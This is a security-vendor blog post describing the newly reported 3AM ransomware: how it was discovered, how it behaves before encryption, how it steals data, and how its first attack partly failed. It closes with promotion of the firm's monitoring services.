In a digital realm teeming with evolving cyber threats, a new variant named the 3AM ransomware has recently surfaced, marking its presence with a distinct modus operandi. This article delves into the discovery, characteristics, and implications of this emerging malware, shedding light on the ever-evolving landscape of cybersecurity.
The spotlight initially fell on 3AM when it was employed as a fallback plan by a ransomware affiliate. The threat operator had previously attempted to deploy the notorious LockBit ransomware, often attributed to the Bitwise Spider or Syrphid groups, but encountered obstacles. As a result, the threat actor resorted to 3AM, making this malware’s existence known.
A defining feature of 3AM is its unique coding. This ransomware is written in Rust, a language not associated with any known ransomware family. This distinction sets it apart as a wholly new and uncharted breed of malware. The creators and affiliates behind 3AM remain mysterious, with no discernible connections to established cybercrime groups.
Before encrypting files, 3AM follows a series of pre-encryption signals. It attempts to disable multiple services running on the compromised system, specifically targeting security and backup products from prominent vendors such as Veeam, Acronis, Ivanti, McAfee, and Symantec. This meticulous approach neutralizes potential obstacles that might hinder the encryption process. Once the encryption procedure is complete, files receive the “.THREEAMTIME” extension. Additionally, the malware strives to eliminate Volume Shadow copies, eliminating any chances of data recovery.
The journey of a 3AM ransomware attack commences with a “gpresult” command, extracting the system’s policy settings for a designated user. This reconnaissance phase is followed by a series of commands commonly used for network enumeration, server enumeration, user persistence, and utilizing the Wput FTP client to transmit stolen files to the threat operator’s server. Symantec’s analysis reveals that the 3AM executable recognizes various command-line parameters, including an access key, an encryption method (local or net), and parameters related to encryption speed control.
Despite being a new and relatively unfamiliar threat, 3 AM’s debut in the cyber arena was unsuccessful. In a specific incident, the threat actor deployed the ransomware on only three machines within the target organization. Encouragingly, defense mechanisms thwarted its activities on two of these systems, highlighting the resilience of existing cybersecurity measures.
The emergence of 3AM ransomware underscores the ever-evolving nature of cyber threats. As it gained prominence as an alternative to LockBit, it will likely attract the interest of other malicious actors. The cybersecurity community should remain vigilant, as 3AM may evolve and adapt, potentially posing a more significant threat.
The rise of 3AM ransomware is a stark reminder of the perpetual cat-and-mouse game between cybercriminals and defenders. While this new entrant was only partially successful in its debut, its existence signals a potential shift in the threat landscape. As cybersecurity professionals continue to adapt and fortify their defenses, the world watches closely for the next chapter in this ongoing cyber saga.
At SpearTip, our certified engineers work at our 24/7/365 Security Operations Center to continuously monitor companies’ data networks for new and current ransomware threats. They are ready to respond to incidents at a moment’s notice. Our risk assessments are designed to uncover security gaps and are accompanied by a technical summary complete with an individualized risk report detailing necessary steps to remediate the gaps. The ShadowSpear Platform, our integrable managed detection and response tool, uses comprehensive insights through unparalleled data normalization and visualizations to expose sophisticated unknown and advanced ransomware threats. Providing cybersecurity awareness training will help companies and their employees better understand the risks of the cyber landscape and develop impactful cybersecurity practices that can reduce the likelihood of cyberattacks.
If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.